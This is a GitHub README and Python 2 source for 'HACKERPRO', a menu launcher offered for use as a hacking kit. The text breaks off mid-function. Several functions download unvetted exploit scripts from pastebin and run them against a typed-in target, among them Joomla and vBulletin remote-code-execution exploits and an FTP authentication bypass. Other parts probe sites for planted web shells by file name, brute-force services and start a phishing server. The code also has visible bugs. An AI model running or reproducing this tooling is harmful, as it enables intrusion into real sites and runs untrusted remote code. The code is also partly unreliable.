***Pentesing Tools That All Hacker Needs***
## HACKERPRO Menu :
- Information Gathering
- Password Attacks
- Wireless Testing
- Exploitation Tools
- Sniffing & Spoofing
- Web Hacking
- Private Web Hacking
- Post Exploitation
- Install The HACKERPRO
### Information Gathering:
- Nmap
- Setoolkit
- Port Scanning
- Host To IP
- wordpress user
- CMS scanner
- XSStrike
- Dork - Google Dorks Passive Vulnerability Auditor
- Scan A server's Users
- Crips
### Password Attacks:
- Cupp
- Ncrack
### Wireless Testing:
- reaver
- pixiewps
- Fluxion
### Exploitation Tools:
- ATSCAN
- sqlmap
- Shellnoob
- commix
- FTP Auto Bypass
- jboss-autopwn
### Sniffing & Spoofing:
- Setoolkit
- SSLtrip
- pyPISHER
- SMTP Mailer
### Web Hacking:
- Drupal Hacking
- Inurlbr
- Wordpress & Joomla Scanner
- Gravity Form Scanner
- File Upload Checker
- Wordpress Exploit Scanner
- Wordpress Plugins Scanner
- Shell and Directory Finder
- Joomla! 1.5 - 3.4.5 remote code execution
- Vbulletin 5.X remote code execution
- BruteX - Automatically brute force all services running on a target
- Arachni - Web Application Security Scanner Framework
### Private Web Hacking:
- Get all websites
- Get joomla websites
- Get wordpress websites
- Control Panel Finder
- Zip Files Finder
- Upload File Finder
- Get server users
- SQli Scanner
- Ports Scan (range of ports)
- ports Scan (common ports)
- Get server Info
- Bypass Cloudflare
### Post Exploitation:
- Shell Checker
- POET
- Weeman
## Installation in Linux :
Open Terminal and Type : ```git clone https://github.com/jaykali/hackerpro.git```
After Downloading The File Type : ```sudo cd hackerpro && sudo python2 hackerpro.py```
Video Tutorial : Coming Soon
## Installation in Android :
1st Download [Termux](https://play.google.com/store/apps/details?id=com.termux)
Then Open Termux and Type : ```apt update && apt upgrade && apt install git && apt install python2```
After That Open Termux and Type : ```git clone https://github.com/jaykali/hackerpro.git```
Then Type : ```cd hackerpro && python2 hackerpro.py```
Video Tutorial : Coming Soon
## License :
[MIT Licence](https://github.com/jaykali/hackerpro/blob/master/LICENSE)
Thats It... If You Like This Repo. Please Share This With Your Friends..
& Don't Forget To Visit Our [Blog For Hackers](https://www.kalilinux.in) !!!
***Thankyou.***
***Keep Visiting..***
***Check our blog https://www.kalilinux.in***
***Enjoy.!!! :)***
Click Here
================================================
FILE: hackerpro.py
================================================
#!/usr/bin/env python2.7
#
#
# _ _ _ _____
# | | | | | | | __ \
# | |__| | __ _ ___| | _____ _ __ | |__) | __ ___
# | __ |/ _` |/ __| |/ / _ \ '__| | ___/ '__/ _ \
# | | | | (_| | (__| < __/ | | | | | | (_) |
# |_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/
# Hacking Tools by-Technical Dada
import sys
import argparse
import os
import time
import httplib
import subprocess
import re
import urllib2
import socket
import urllib
import sys
import json
import telnetlib
import glob
import random
import Queue
import threading
#import requests
import base64
from getpass import getpass
from commands import *
from sys import argv
from platform import system
from urlparse import urlparse
from xml.dom import minidom
from optparse import OptionParser
from time import sleep
##########################
os.system('clear')
def menu():
print ("""
MIT License
Copyright (c) 2018 HACKERPRO
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.""")
os.system('clear')
os.system('clear')
os.system('clear')
os.system('clear')
directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/',
'/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/']
shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php',
'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php']
upload = []
yes = set(['yes', 'y', 'ye', 'Y'])
no = set(['no', 'n'])
def logo():
print """
- Powered by
_______ _ _ _ _____ _
|__ __| | | (_) | | | __ \ | |
| | ___ ___| |__ _ __ _ ___ __ _| | | | | | __ _ __| | __ _
| |/ _ \/ __| '_ \| '_ \| |/ __/ _` | | | | | |/ _` |/ _` |/ _` |
| | __/ (__| | | | | | | | (_| (_| | | | |__| | (_| | (_| | (_| |
|_|\___|\___|_| |_|_| |_|_|\___\__,_|_| |_____/ \__,_|\__,_|\__,_|
"""
HACKERPROlogo = """\033[0m
_ _ _ _____
| | | | | | | __ \
| |__| | __ _ ___| | _____ _ __ | |__) | __ ___
| __ |/ _` |/ __| |/ / _ \ '__| | ___/ '__/ _ \
| | | | (_| | (__| < __/ | | | | | | (_) |
|_| |_|\__,_|\___|_|\_\___|_| |_| |_| \___/
~Tools For Hacking by by-Technical Dada
\033[91m"""
def menu():
print (HACKERPROlogo + """\033[1m
[!] This Tool Must Run As ROOT [!] https://github.com/technicaldada/hackerpro
\033[0m
{1}--Information Gathering
{2}--Password Attacks
{3}--Wireless Testing
{4}--Exploitation Tools
{5}--Sniffing & Spoofing
{6}--Web Hacking
{7}--Private Web Hacking
{8}--Post Exploitation
{0}--Install The HACKERPRO
{99}-Exit
""")
choice = raw_input("hackerpro~# ")
os.system('clear')
if choice == "1":
info()
elif choice == "2":
passwd()
elif choice == "3":
wire()
elif choice == "4":
exp()
elif choice == "5":
snif()
elif choice == "6":
webhack()
elif choice == "7":
dzz()
elif choice == "8":
postexp()
elif choice == "0":
updatehackerpro()
elif choice == "99":
clearScr(), sys.exit()
elif choice == "":
menu()
else:
menu()
def updatehackerpro():
print ("This Tool is Only Available for Linux and Similar Systems. ")
choiceupdate = raw_input("Continue Y / N: ")
if choiceupdate in yes:
os.system("git clone https://github.com/technicaldada/hackerpro.git")
os.system("cd hackerpro && sudo bash ./update.sh")
os.system("hackerpro")
def doork():
print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
doorkchice = raw_input("Continue Y / N: ")
if doorkchice in yes:
os.system("pip install beautifulsoup4 && pip install requests")
os.system("git clone https://github.com/AeonDave/doork")
clearScr()
doorkt = raw_input("Target : ")
os.system("cd doork && python doork.py -t %s -o log.log" % doorkt)
def postexp():
clearScr()
print(HACKERPROlogo)
print(" {1}--Shell Checker")
print(" {2}--POET")
print(" {3}--Phishing Framework \n")
print(" {99}-Return to main menu \n\n ")
choice11 = raw_input("hackerpro~# ")
os.system('clear')
if choice11 == "1":
sitechecker()
if choice11 == "2":
poet()
if choice11 == "3":
weeman()
elif choice11 == "99":
menu()
def scanusers():
site = raw_input('Enter a website : ')
try:
users = site
if 'http://www.' in users:
users = users.replace('http://www.', '')
if 'http://' in users:
users = users.replace('http://', '')
if '.' in users:
users = users.replace('.', '')
if '-' in users:
users = users.replace('-', '')
if '/' in users:
users = users.replace('/', '')
while len(users) > 2:
print users
resp = urllib2.urlopen(
site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()
if 'invalid username' not in resp.lower():
print "\tFound -> %s" % users
pass
users = users[:-1]
except:
pass
def brutex():
clearScr()
print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
os.system("git clone https://github.com/1N3/BruteX.git")
clearScr()
brutexchoice = raw_input("Select a Target : ")
os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice)
def arachni():
print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
cara = raw_input("Install And Run ? Y / N : ")
clearScr()
print("exemple : http://www.target.com/")
tara = raw_input("Select a target to scan : ")
if cara in yes:
os.system("git clone git://github.com/Arachni/arachni.git")
os.system(
"cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
os.system("archani")
clearScr()
os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara)
def XSStrike():
clearScr()
print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers")
os.system("sudo rm -rf XSStrike")
os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike")
def crips():
clearScr()
os.system("git clone https://github.com/Manisso/Crips.git")
os.system("cd Crips && sudo bash ./update.sh")
os.system("crips")
os.system("clear")
def weeman():
print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
choicewee = raw_input("Install Weeman ? Y / N : ")
if choicewee in yes:
os.system(
"git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py")
if choicewee in no:
menu()
else:
menu()
def gabriel():
print("Abusing authentication bypass of Open&Compact (Gabriel's)")
os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
clearScr()
os.system("python gabriel.py")
ftpbypass = raw_input("Enter Target IP and Use Command :")
os.system("python gabriel.py %s" % ftpbypass)
def sitechecker():
os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
clearScr()
os.system("python ch01.py")
def h2ip():
host = raw_input("Select A Host : ")
ips = socket.gethostbyname(host)
print(ips)
def ports():
clearScr()
target = raw_input('Select a Target IP : ')
os.system("nmap -O -Pn %s" % target)
sys.exit()
def ifinurl():
print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
print('Do You Want To Install InurlBR ? ')
cinurl = raw_input("Y/N: ")
if cinurl in yes:
inurl()
if cinurl in no:
menu()
elif cinurl == "":
menu()
else:
menu()
def bsqlbf():
clearScr()
print("This tool will only work on blind sql injection")
cbsq = raw_input("select target : ")
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")
def atscan():
print ("Do You To Install ATSCAN ?")
choiceshell = raw_input("Y/N: ")
if choiceshell in yes:
os.system("sudo rm -rf ATSCAN")
os.system(
"git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl")
elif choiceshell in no:
os.system('clear')
menu()
def commix():
print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
print ("usage : python commix.py --help")
choicecmx = raw_input("Continue: y/n :")
if choicecmx in yes:
os.system("git clone https://github.com/stasinopoulos/commix.git commix")
os.system("cd commix")
os.system("python commix.py")
os.system("")
elif choicecmx in no:
os.system('clear')
info()
def pixiewps():
print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
"""
choicewps = raw_input("Continue ? Y/N : ")
if choicewps in yes:
os.system("git clone https://github.com/wiire/pixiewps.git")
os.system("cd pixiewps & make ")
os.system("sudo make install")
if choicewps in no:
menu()
elif choicewps == "":
menu()
else:
menu()
def webhack():
print(HACKERPROlogo)
print(" {1}--Drupal Hacking ")
print(" {2}--Inurlbr")
print(" {3}--Wordpress & Joomla Scanner")
print(" {4}--Gravity Form Scanner")
print(" {5}--File Upload Checker")
print(" {6}--Wordpress Exploit Scanner")
print(" {7}--Wordpress Plugins Scanner")
print(" {8}--Shell and Directory Finder")
print(" {9}--Joomla! 1.5 - 3.4.5 remote code execution")
print(" {10}-Vbulletin 5.X remote code execution")
print(
" {11}-BruteX - Automatically brute force all services running on a target")
print(" {12}-Arachni - Web Application Security Scanner Framework \n ")
print(" {99}-Back To Main Menu \n")
choiceweb = raw_input("hackerpro~# ")
if choiceweb == "1":
clearScr()
maine()
if choiceweb == "2":
clearScr()
ifinurl()
if choiceweb == '3':
clearScr()
wppjmla()
if choiceweb == "4":
clearScr()
gravity()
if choiceweb == "5":
clearScr()
sqlscan()
if choiceweb == "6":
clearScr()
wpminiscanner()
if choiceweb == "7":
clearScr()
wppluginscan()
if choiceweb == "8":
clearScr()
shelltarget()
if choiceweb == "9":
clearScr()
joomlarce()
if choiceweb == "10":
clearScr()
vbulletinrce()
if choiceweb == "11":
clearScr()
brutex()
if choiceweb == "12":
clearScr()
arachni()
elif choiceweb == "99":
menu()
elif choiceweb == "":
menu()
else:
menu()
def vbulletinrce():
os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
os.system("perl tmp.pl")
def joomlarce():
os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
clearScr()
print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
jmtarget = raw_input("Select a targets list :")
os.system("python temp.py %s" % jmtarget)
def inurl():
dork = raw_input("select a Dork:")
output = raw_input("select a file to save :")
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
if cinurl in no:
insinurl()
elif cinurl == "":
menu()
else:
menu()
def insinurl():
os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
clearScr()
inurl()
def nmap():
choice7 = raw_input("continue ? Y / N : ")
if choice7 in yes:
os.system("git clone https://github.com/nmap/nmap.git")
os.system("cd nmap && ./configure && make && make install")
elif choice7 in no:
info()
elif choice7 == "":
menu()
else:
menu()
def jboss():
os.system('clear')
print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
print ("deployed, the script uses its upload and command execution capability to")
print ("provide an interactive session.")
print ("")
print ("usage : ./e.sh target_ip tcp_port ")
print("Continue: y/n")
choice9 = raw_input("yes / no :")
if choice9 in yes:
os.system(
"git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit()
elif choice9 in no:
os.system('clear')
exp()
elif choice9 == "":
menu()
else:
menu()
def wppluginscan():
Notfound = [404, 401, 400, 403, 406, 301]
sitesfile = raw_input("sites file : ")
filepath = raw_input("Plugins File : ")
def scan(site, dir):
global resp
try:
conn = httplib.HTTPConnection(site)
conn.request('HEAD', "/wp-content/plugins/" + dir)
resp = conn.getresponse().status
except(), message:
print "Cant Connect :", message
pass
def timer():
now = time.localtime(time.time())
return time.asctime(now)
def main():
sites = open(sitesfile).readlines()
plugins = open(filepath).readlines()
for site in sites:
site = site.rstrip()
for plugin in plugins:
plugin = plugin.rstrip()
scan(site, plugin)
if resp not in Notfound:
print "+----------------------------------------+"
print "| current site :" + site
print "| Found Plugin : " + plugin
print "| Result:", resp
def sqlmap():
print ("usage : python sqlmap.py -h")
choice8 = raw_input("Continue: y/n :")
if choice8 in yes:
os.system(
"git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
elif choice8 in no:
os.system('clear')
info()
elif choice8 == "":
menu()
else:
menu()
def grabuploadedlink(url):
try:
for dir in directories:
currentcode = urllib.urlopen(url + dir).getcode()
if currentcode == 200 or currentcode == 403:
print "-------------------------"
print " [ + ] Found Directory : " + str(url + dir) + " [ + ]"
print "-------------------------"
upload.append(url + dir)
except:
pass
def grabshell(url):
try:
for upl in upload:
for shell in shells:
currentcode = urllib.urlopen(upl + shell).getcode()
if currentcode == 200:
print "-------------------------"
print " [ ! ] Found Shell : " + str(upl + shell) + " [ ! ]"
print "-------------------------"
except:
pass
def shelltarget():
print("exemple : http://target.com")
line = raw_input("target : ")
line = line.rstrip()
grabuploadedlink(line)
grabshell(line)
def poet():
print("POET is a simple POst-Exploitation Tool.")
print("")
choicepoet = raw_input("y / n :")
if choicepoet in yes:
os.system("git clone https://github.com/mossberg/poet.git")
os.system("python poet/server.py")
if choicepoet in no:
clearScr()
postexp()
elif choicepoet == "":
menu()
else:
menu()
def setoolkit():
print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
print(") designed for social engineering. SET has a number of custom attack vectors that ")
print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ")
print("an information security consulting firm located in Cleveland, Ohio.")
print("")
choiceset = raw_input("y / n :")
if choiceset in yes:
os.system(
"git clone https://github.com/trustedsec/social-engineer-toolkit.git")
os.system("python social-engineer-toolkit/setup.py")
if choiceset in no:
clearScr()
info()
elif choiceset == "":
menu()
else:
menu()
def cupp():
print("cupp is a password list generator ")
print("Usage: python cupp.py -h")
choicecupp = raw_input("Continue: y/n : ")
if choicecupp in yes:
os.system("git clone https://github.com/Mebus/cupp.git")
print("file downloaded successfully")
elif choicecupp in no:
clearScr()
passwd()
elif choicecupp == "":
menu()
else:
menu()
def ncrack():
print("A Ruby interface to Ncrack, Network authentication cracking tool.")
print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
print("Continue: y/n")
choicencrack = raw_input("y / n :")
if choicencrack in yes:
os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
os.system("cd ruby-ncrack")
os.system("install ruby-ncrack")
elif choicencrack in no:
clearScr()
passwd()
elif choicencrack == "":
menu()
else:
menu()
def reaver():
print """
Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
wide variety of access points and WPS implementations
1 to accept / 0 to decline
"""
creaver = raw_input("y / n :")
if creaver in yes:
os.system(
"apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
os.system("cd reaver-wps-fork-t6x/src/ & make")
elif creaver in no:
clearScr()
wire()
elif creaver == "":
menu()
else:
menu()
def ssls():
print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.
It requires Python 2.5 or newer, along with the 'twisted' python module."""
cssl = raw_input("y / n :")
if cssl in yes:
os.system("git clone https://github.com/moxie0/sslstrip.git")
os.system("sudo apt-get install python-twisted-web")
os.system("python sslstrip/setup.py")
if cssl in no:
snif()
elif cssl == "":
menu()
else:
menu()
def unique(seq):
seen = set()
return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):
lista = []
page = 1
while page <= 101:
try:
bing = "http://www.bing.com/search?q=ip%3A" + \
s + "+&count=50&first=" + str(page)
openbing = urllib2.urlopen(bing)
readbing = openbing.read()
findwebs = re.findall('